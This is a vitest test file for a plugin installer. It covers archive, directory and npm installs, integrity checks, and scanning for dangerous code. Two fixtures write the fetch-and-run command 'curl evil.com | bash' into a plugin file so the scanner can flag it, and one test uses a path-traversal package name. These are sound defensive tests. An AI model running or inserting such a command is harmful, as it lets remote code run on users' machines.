612 lines
18 KiB
TypeScript
612 lines
18 KiB
TypeScript
import { randomUUID } from "node:crypto";
|
|
import fs from "node:fs";
|
|
import os from "node:os";
|
|
import path from "node:path";
|
|
import JSZip from "jszip";
|
|
import * as tar from "tar";
|
|
import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest";
|
|
import * as skillScanner from "../security/skill-scanner.js";
|
|
import { expectSingleNpmPackIgnoreScriptsCall } from "../test-utils/exec-assertions.js";
|
|
import {
|
|
expectInstallUsesIgnoreScripts,
|
|
expectIntegrityDriftRejected,
|
|
expectUnsupportedNpmSpec,
|
|
mockNpmPackMetadataResult,
|
|
} from "../test-utils/npm-spec-install-test-helpers.js";
|
|
|
|
vi.mock("../process/exec.js", () => ({
|
|
runCommandWithTimeout: vi.fn(),
|
|
}));
|
|
|
|
const tempDirs: string[] = [];
|
|
let installPluginFromArchive: typeof import("./install.js").installPluginFromArchive;
|
|
let installPluginFromDir: typeof import("./install.js").installPluginFromDir;
|
|
let installPluginFromNpmSpec: typeof import("./install.js").installPluginFromNpmSpec;
|
|
let runCommandWithTimeout: typeof import("../process/exec.js").runCommandWithTimeout;
|
|
|
|
function makeTempDir() {
|
|
const dir = path.join(os.tmpdir(), `openclaw-plugin-install-${randomUUID()}`);
|
|
fs.mkdirSync(dir, { recursive: true });
|
|
tempDirs.push(dir);
|
|
return dir;
|
|
}
|
|
|
|
async function packToArchive({
|
|
pkgDir,
|
|
outDir,
|
|
outName,
|
|
}: {
|
|
pkgDir: string;
|
|
outDir: string;
|
|
outName: string;
|
|
}) {
|
|
const dest = path.join(outDir, outName);
|
|
fs.rmSync(dest, { force: true });
|
|
await tar.c(
|
|
{
|
|
gzip: true,
|
|
file: dest,
|
|
cwd: path.dirname(pkgDir),
|
|
},
|
|
[path.basename(pkgDir)],
|
|
);
|
|
return dest;
|
|
}
|
|
|
|
function writePluginPackage(params: {
|
|
pkgDir: string;
|
|
name: string;
|
|
version: string;
|
|
extensions: string[];
|
|
}) {
|
|
fs.mkdirSync(path.join(params.pkgDir, "dist"), { recursive: true });
|
|
fs.writeFileSync(
|
|
path.join(params.pkgDir, "package.json"),
|
|
JSON.stringify(
|
|
{
|
|
name: params.name,
|
|
version: params.version,
|
|
openclaw: { extensions: params.extensions },
|
|
},
|
|
null,
|
|
2,
|
|
),
|
|
"utf-8",
|
|
);
|
|
fs.writeFileSync(path.join(params.pkgDir, "dist", "index.js"), "export {};", "utf-8");
|
|
}
|
|
|
|
async function createVoiceCallArchive(params: {
|
|
workDir: string;
|
|
outName: string;
|
|
version: string;
|
|
}) {
|
|
const pkgDir = path.join(params.workDir, "package");
|
|
writePluginPackage({
|
|
pkgDir,
|
|
name: "@openclaw/voice-call",
|
|
version: params.version,
|
|
extensions: ["./dist/index.js"],
|
|
});
|
|
const archivePath = await packToArchive({
|
|
pkgDir,
|
|
outDir: params.workDir,
|
|
outName: params.outName,
|
|
});
|
|
return { pkgDir, archivePath };
|
|
}
|
|
|
|
async function createVoiceCallArchiveBuffer(version: string): Promise<Buffer> {
|
|
const workDir = makeTempDir();
|
|
const { archivePath } = await createVoiceCallArchive({
|
|
workDir,
|
|
outName: `plugin-${version}.tgz`,
|
|
version,
|
|
});
|
|
return fs.readFileSync(archivePath);
|
|
}
|
|
|
|
function writeArchiveBuffer(params: { outName: string; buffer: Buffer }): string {
|
|
const workDir = makeTempDir();
|
|
const archivePath = path.join(workDir, params.outName);
|
|
fs.writeFileSync(archivePath, params.buffer);
|
|
return archivePath;
|
|
}
|
|
|
|
async function createZipperArchiveBuffer(): Promise<Buffer> {
|
|
const zip = new JSZip();
|
|
zip.file(
|
|
"package/package.json",
|
|
JSON.stringify({
|
|
name: "@openclaw/zipper",
|
|
version: "0.0.1",
|
|
openclaw: { extensions: ["./dist/index.js"] },
|
|
}),
|
|
);
|
|
zip.file("package/dist/index.js", "export {};");
|
|
return zip.generateAsync({ type: "nodebuffer" });
|
|
}
|
|
|
|
const VOICE_CALL_ARCHIVE_V1_BUFFER_PROMISE = createVoiceCallArchiveBuffer("0.0.1");
|
|
const VOICE_CALL_ARCHIVE_V2_BUFFER_PROMISE = createVoiceCallArchiveBuffer("0.0.2");
|
|
const ZIPPER_ARCHIVE_BUFFER_PROMISE = createZipperArchiveBuffer();
|
|
|
|
async function getVoiceCallArchiveBuffer(version: string): Promise<Buffer> {
|
|
if (version === "0.0.1") {
|
|
return VOICE_CALL_ARCHIVE_V1_BUFFER_PROMISE;
|
|
}
|
|
if (version === "0.0.2") {
|
|
return VOICE_CALL_ARCHIVE_V2_BUFFER_PROMISE;
|
|
}
|
|
return createVoiceCallArchiveBuffer(version);
|
|
}
|
|
|
|
async function setupVoiceCallArchiveInstall(params: { outName: string; version: string }) {
|
|
const stateDir = makeTempDir();
|
|
const archiveBuffer = await getVoiceCallArchiveBuffer(params.version);
|
|
const archivePath = writeArchiveBuffer({ outName: params.outName, buffer: archiveBuffer });
|
|
return {
|
|
stateDir,
|
|
archivePath,
|
|
extensionsDir: path.join(stateDir, "extensions"),
|
|
};
|
|
}
|
|
|
|
function expectPluginFiles(result: { targetDir: string }, stateDir: string, pluginId: string) {
|
|
expect(result.targetDir).toBe(path.join(stateDir, "extensions", pluginId));
|
|
expect(fs.existsSync(path.join(result.targetDir, "package.json"))).toBe(true);
|
|
expect(fs.existsSync(path.join(result.targetDir, "dist", "index.js"))).toBe(true);
|
|
}
|
|
|
|
function setupPluginInstallDirs() {
|
|
const tmpDir = makeTempDir();
|
|
const pluginDir = path.join(tmpDir, "plugin-src");
|
|
const extensionsDir = path.join(tmpDir, "extensions");
|
|
fs.mkdirSync(pluginDir, { recursive: true });
|
|
fs.mkdirSync(extensionsDir, { recursive: true });
|
|
return { tmpDir, pluginDir, extensionsDir };
|
|
}
|
|
|
|
async function installFromDirWithWarnings(params: { pluginDir: string; extensionsDir: string }) {
|
|
const warnings: string[] = [];
|
|
const result = await installPluginFromDir({
|
|
dirPath: params.pluginDir,
|
|
extensionsDir: params.extensionsDir,
|
|
logger: {
|
|
info: () => {},
|
|
warn: (msg: string) => warnings.push(msg),
|
|
},
|
|
});
|
|
return { result, warnings };
|
|
}
|
|
|
|
async function expectArchiveInstallReservedSegmentRejection(params: {
|
|
packageName: string;
|
|
outName: string;
|
|
}) {
|
|
const result = await installArchivePackageAndReturnResult({
|
|
packageJson: {
|
|
name: params.packageName,
|
|
version: "0.0.1",
|
|
openclaw: { extensions: ["./dist/index.js"] },
|
|
},
|
|
outName: params.outName,
|
|
withDistIndex: true,
|
|
});
|
|
|
|
expect(result.ok).toBe(false);
|
|
if (result.ok) {
|
|
return;
|
|
}
|
|
expect(result.error).toContain("reserved path segment");
|
|
}
|
|
|
|
async function installArchivePackageAndReturnResult(params: {
|
|
packageJson: Record<string, unknown>;
|
|
outName: string;
|
|
withDistIndex?: boolean;
|
|
}) {
|
|
const stateDir = makeTempDir();
|
|
const workDir = makeTempDir();
|
|
const pkgDir = path.join(workDir, "package");
|
|
fs.mkdirSync(pkgDir, { recursive: true });
|
|
if (params.withDistIndex) {
|
|
fs.mkdirSync(path.join(pkgDir, "dist"), { recursive: true });
|
|
fs.writeFileSync(path.join(pkgDir, "dist", "index.js"), "export {};", "utf-8");
|
|
}
|
|
fs.writeFileSync(path.join(pkgDir, "package.json"), JSON.stringify(params.packageJson), "utf-8");
|
|
|
|
const archivePath = await packToArchive({
|
|
pkgDir,
|
|
outDir: workDir,
|
|
outName: params.outName,
|
|
});
|
|
|
|
const extensionsDir = path.join(stateDir, "extensions");
|
|
const result = await installPluginFromArchive({
|
|
archivePath,
|
|
extensionsDir,
|
|
});
|
|
return result;
|
|
}
|
|
|
|
afterAll(() => {
|
|
for (const dir of tempDirs.splice(0)) {
|
|
try {
|
|
fs.rmSync(dir, { recursive: true, force: true });
|
|
} catch {
|
|
// ignore cleanup failures
|
|
}
|
|
}
|
|
});
|
|
|
|
beforeAll(async () => {
|
|
({ installPluginFromArchive, installPluginFromDir, installPluginFromNpmSpec } =
|
|
await import("./install.js"));
|
|
({ runCommandWithTimeout } = await import("../process/exec.js"));
|
|
});
|
|
|
|
beforeEach(() => {
|
|
vi.clearAllMocks();
|
|
});
|
|
|
|
describe("installPluginFromArchive", () => {
|
|
it("installs into ~/.openclaw/extensions and uses unscoped id", async () => {
|
|
const { stateDir, archivePath, extensionsDir } = await setupVoiceCallArchiveInstall({
|
|
outName: "plugin.tgz",
|
|
version: "0.0.1",
|
|
});
|
|
|
|
const result = await installPluginFromArchive({
|
|
archivePath,
|
|
extensionsDir,
|
|
});
|
|
expect(result.ok).toBe(true);
|
|
if (!result.ok) {
|
|
return;
|
|
}
|
|
expect(result.pluginId).toBe("voice-call");
|
|
expectPluginFiles(result, stateDir, "voice-call");
|
|
});
|
|
|
|
it("rejects installing when plugin already exists", async () => {
|
|
const { archivePath, extensionsDir } = await setupVoiceCallArchiveInstall({
|
|
outName: "plugin.tgz",
|
|
version: "0.0.1",
|
|
});
|
|
|
|
const first = await installPluginFromArchive({
|
|
archivePath,
|
|
extensionsDir,
|
|
});
|
|
const second = await installPluginFromArchive({
|
|
archivePath,
|
|
extensionsDir,
|
|
});
|
|
|
|
expect(first.ok).toBe(true);
|
|
expect(second.ok).toBe(false);
|
|
if (second.ok) {
|
|
return;
|
|
}
|
|
expect(second.error).toContain("already exists");
|
|
});
|
|
|
|
it("installs from a zip archive", async () => {
|
|
const stateDir = makeTempDir();
|
|
const archivePath = writeArchiveBuffer({
|
|
outName: "plugin.zip",
|
|
buffer: await ZIPPER_ARCHIVE_BUFFER_PROMISE,
|
|
});
|
|
|
|
const extensionsDir = path.join(stateDir, "extensions");
|
|
const result = await installPluginFromArchive({
|
|
archivePath,
|
|
extensionsDir,
|
|
});
|
|
|
|
expect(result.ok).toBe(true);
|
|
if (!result.ok) {
|
|
return;
|
|
}
|
|
expect(result.pluginId).toBe("zipper");
|
|
expectPluginFiles(result, stateDir, "zipper");
|
|
});
|
|
|
|
it("allows updates when mode is update", async () => {
|
|
const stateDir = makeTempDir();
|
|
const archiveV1 = writeArchiveBuffer({
|
|
outName: "plugin-v1.tgz",
|
|
buffer: await VOICE_CALL_ARCHIVE_V1_BUFFER_PROMISE,
|
|
});
|
|
const archiveV2 = writeArchiveBuffer({
|
|
outName: "plugin-v2.tgz",
|
|
buffer: await VOICE_CALL_ARCHIVE_V2_BUFFER_PROMISE,
|
|
});
|
|
|
|
const extensionsDir = path.join(stateDir, "extensions");
|
|
const first = await installPluginFromArchive({
|
|
archivePath: archiveV1,
|
|
extensionsDir,
|
|
});
|
|
const second = await installPluginFromArchive({
|
|
archivePath: archiveV2,
|
|
extensionsDir,
|
|
mode: "update",
|
|
});
|
|
|
|
expect(first.ok).toBe(true);
|
|
expect(second.ok).toBe(true);
|
|
if (!second.ok) {
|
|
return;
|
|
}
|
|
const manifest = JSON.parse(
|
|
fs.readFileSync(path.join(second.targetDir, "package.json"), "utf-8"),
|
|
) as { version?: string };
|
|
expect(manifest.version).toBe("0.0.2");
|
|
});
|
|
|
|
it("rejects traversal-like plugin names", async () => {
|
|
await expectArchiveInstallReservedSegmentRejection({
|
|
packageName: "@evil/..",
|
|
outName: "traversal.tgz",
|
|
});
|
|
});
|
|
|
|
it("rejects reserved plugin ids", async () => {
|
|
await expectArchiveInstallReservedSegmentRejection({
|
|
packageName: "@evil/.",
|
|
outName: "reserved.tgz",
|
|
});
|
|
});
|
|
|
|
it("rejects packages without openclaw.extensions", async () => {
|
|
const result = await installArchivePackageAndReturnResult({
|
|
packageJson: { name: "@openclaw/nope", version: "0.0.1" },
|
|
outName: "bad.tgz",
|
|
});
|
|
expect(result.ok).toBe(false);
|
|
if (result.ok) {
|
|
return;
|
|
}
|
|
expect(result.error).toContain("openclaw.extensions");
|
|
});
|
|
|
|
it("warns when plugin contains dangerous code patterns", async () => {
|
|
const { pluginDir, extensionsDir } = setupPluginInstallDirs();
|
|
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, "package.json"),
|
|
JSON.stringify({
|
|
name: "dangerous-plugin",
|
|
version: "1.0.0",
|
|
openclaw: { extensions: ["index.js"] },
|
|
}),
|
|
);
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, "index.js"),
|
|
`const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
|
|
);
|
|
|
|
const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
|
|
|
|
expect(result.ok).toBe(true);
|
|
expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
|
|
});
|
|
|
|
it("scans extension entry files in hidden directories", async () => {
|
|
const { pluginDir, extensionsDir } = setupPluginInstallDirs();
|
|
fs.mkdirSync(path.join(pluginDir, ".hidden"), { recursive: true });
|
|
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, "package.json"),
|
|
JSON.stringify({
|
|
name: "hidden-entry-plugin",
|
|
version: "1.0.0",
|
|
openclaw: { extensions: [".hidden/index.js"] },
|
|
}),
|
|
);
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, ".hidden", "index.js"),
|
|
`const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
|
|
);
|
|
|
|
const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
|
|
|
|
expect(result.ok).toBe(true);
|
|
expect(warnings.some((w) => w.includes("hidden/node_modules path"))).toBe(true);
|
|
expect(warnings.some((w) => w.includes("dangerous code pattern"))).toBe(true);
|
|
});
|
|
|
|
it("continues install when scanner throws", async () => {
|
|
const scanSpy = vi
|
|
.spyOn(skillScanner, "scanDirectoryWithSummary")
|
|
.mockRejectedValueOnce(new Error("scanner exploded"));
|
|
|
|
const { pluginDir, extensionsDir } = setupPluginInstallDirs();
|
|
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, "package.json"),
|
|
JSON.stringify({
|
|
name: "scan-fail-plugin",
|
|
version: "1.0.0",
|
|
openclaw: { extensions: ["index.js"] },
|
|
}),
|
|
);
|
|
fs.writeFileSync(path.join(pluginDir, "index.js"), "export {};");
|
|
|
|
const { result, warnings } = await installFromDirWithWarnings({ pluginDir, extensionsDir });
|
|
|
|
expect(result.ok).toBe(true);
|
|
expect(warnings.some((w) => w.includes("code safety scan failed"))).toBe(true);
|
|
scanSpy.mockRestore();
|
|
});
|
|
});
|
|
|
|
describe("installPluginFromDir", () => {
|
|
it("uses --ignore-scripts for dependency install", async () => {
|
|
const workDir = makeTempDir();
|
|
const stateDir = makeTempDir();
|
|
const pluginDir = path.join(workDir, "plugin");
|
|
fs.mkdirSync(path.join(pluginDir, "dist"), { recursive: true });
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, "package.json"),
|
|
JSON.stringify({
|
|
name: "@openclaw/test-plugin",
|
|
version: "0.0.1",
|
|
openclaw: { extensions: ["./dist/index.js"] },
|
|
dependencies: { "left-pad": "1.3.0" },
|
|
}),
|
|
"utf-8",
|
|
);
|
|
fs.writeFileSync(path.join(pluginDir, "dist", "index.js"), "export {};", "utf-8");
|
|
|
|
const run = vi.mocked(runCommandWithTimeout);
|
|
await expectInstallUsesIgnoreScripts({
|
|
run,
|
|
install: async () =>
|
|
await installPluginFromDir({
|
|
dirPath: pluginDir,
|
|
extensionsDir: path.join(stateDir, "extensions"),
|
|
}),
|
|
});
|
|
});
|
|
|
|
it("strips workspace devDependencies before npm install", async () => {
|
|
const workDir = makeTempDir();
|
|
const stateDir = makeTempDir();
|
|
const pluginDir = path.join(workDir, "plugin");
|
|
fs.mkdirSync(path.join(pluginDir, "dist"), { recursive: true });
|
|
fs.writeFileSync(
|
|
path.join(pluginDir, "package.json"),
|
|
JSON.stringify({
|
|
name: "@openclaw/test-plugin",
|
|
version: "0.0.1",
|
|
openclaw: { extensions: ["./dist/index.js"] },
|
|
dependencies: { "left-pad": "1.3.0" },
|
|
devDependencies: {
|
|
openclaw: "workspace:*",
|
|
vitest: "^3.0.0",
|
|
},
|
|
}),
|
|
"utf-8",
|
|
);
|
|
fs.writeFileSync(path.join(pluginDir, "dist", "index.js"), "export {};", "utf-8");
|
|
|
|
const run = vi.mocked(runCommandWithTimeout);
|
|
run.mockResolvedValue({
|
|
code: 0,
|
|
stdout: "",
|
|
stderr: "",
|
|
signal: null,
|
|
killed: false,
|
|
termination: "exit",
|
|
});
|
|
|
|
const res = await installPluginFromDir({
|
|
dirPath: pluginDir,
|
|
extensionsDir: path.join(stateDir, "extensions"),
|
|
});
|
|
expect(res.ok).toBe(true);
|
|
if (!res.ok) {
|
|
return;
|
|
}
|
|
|
|
const manifest = JSON.parse(
|
|
fs.readFileSync(path.join(res.targetDir, "package.json"), "utf-8"),
|
|
) as {
|
|
devDependencies?: Record<string, string>;
|
|
};
|
|
expect(manifest.devDependencies?.openclaw).toBeUndefined();
|
|
expect(manifest.devDependencies?.vitest).toBe("^3.0.0");
|
|
});
|
|
});
|
|
|
|
describe("installPluginFromNpmSpec", () => {
|
|
it("uses --ignore-scripts for npm pack and cleans up temp dir", async () => {
|
|
const stateDir = makeTempDir();
|
|
|
|
const extensionsDir = path.join(stateDir, "extensions");
|
|
fs.mkdirSync(extensionsDir, { recursive: true });
|
|
|
|
const run = vi.mocked(runCommandWithTimeout);
|
|
const voiceCallArchiveBuffer = await VOICE_CALL_ARCHIVE_V1_BUFFER_PROMISE;
|
|
|
|
let packTmpDir = "";
|
|
const packedName = "voice-call-0.0.1.tgz";
|
|
run.mockImplementation(async (argv, opts) => {
|
|
if (argv[0] === "npm" && argv[1] === "pack") {
|
|
packTmpDir = String(typeof opts === "number" ? "" : (opts.cwd ?? ""));
|
|
fs.writeFileSync(path.join(packTmpDir, packedName), voiceCallArchiveBuffer);
|
|
return {
|
|
code: 0,
|
|
stdout: JSON.stringify([
|
|
{
|
|
id: "@openclaw/voice-call@0.0.1",
|
|
name: "@openclaw/voice-call",
|
|
version: "0.0.1",
|
|
filename: packedName,
|
|
integrity: "sha512-plugin-test",
|
|
shasum: "pluginshasum",
|
|
},
|
|
]),
|
|
stderr: "",
|
|
signal: null,
|
|
killed: false,
|
|
termination: "exit",
|
|
};
|
|
}
|
|
throw new Error(`unexpected command: ${argv.join(" ")}`);
|
|
});
|
|
|
|
const result = await installPluginFromNpmSpec({
|
|
spec: "@openclaw/voice-call@0.0.1",
|
|
extensionsDir,
|
|
logger: { info: () => {}, warn: () => {} },
|
|
});
|
|
expect(result.ok).toBe(true);
|
|
if (!result.ok) {
|
|
return;
|
|
}
|
|
expect(result.npmResolution?.resolvedSpec).toBe("@openclaw/voice-call@0.0.1");
|
|
expect(result.npmResolution?.integrity).toBe("sha512-plugin-test");
|
|
|
|
expectSingleNpmPackIgnoreScriptsCall({
|
|
calls: run.mock.calls,
|
|
expectedSpec: "@openclaw/voice-call@0.0.1",
|
|
});
|
|
|
|
expect(packTmpDir).not.toBe("");
|
|
expect(fs.existsSync(packTmpDir)).toBe(false);
|
|
});
|
|
|
|
it("rejects non-registry npm specs", async () => {
|
|
await expectUnsupportedNpmSpec((spec) => installPluginFromNpmSpec({ spec }));
|
|
});
|
|
|
|
it("aborts when integrity drift callback rejects the fetched artifact", async () => {
|
|
const run = vi.mocked(runCommandWithTimeout);
|
|
mockNpmPackMetadataResult(run, {
|
|
id: "@openclaw/voice-call@0.0.1",
|
|
name: "@openclaw/voice-call",
|
|
version: "0.0.1",
|
|
filename: "voice-call-0.0.1.tgz",
|
|
integrity: "sha512-new",
|
|
shasum: "newshasum",
|
|
});
|
|
|
|
const onIntegrityDrift = vi.fn(async () => false);
|
|
const result = await installPluginFromNpmSpec({
|
|
spec: "@openclaw/voice-call@0.0.1",
|
|
expectedIntegrity: "sha512-old",
|
|
onIntegrityDrift,
|
|
});
|
|
expectIntegrityDriftRejected({
|
|
onIntegrityDrift,
|
|
result,
|
|
expectedIntegrity: "sha512-old",
|
|
actualIntegrity: "sha512-new",
|
|
});
|
|
});
|
|
});
|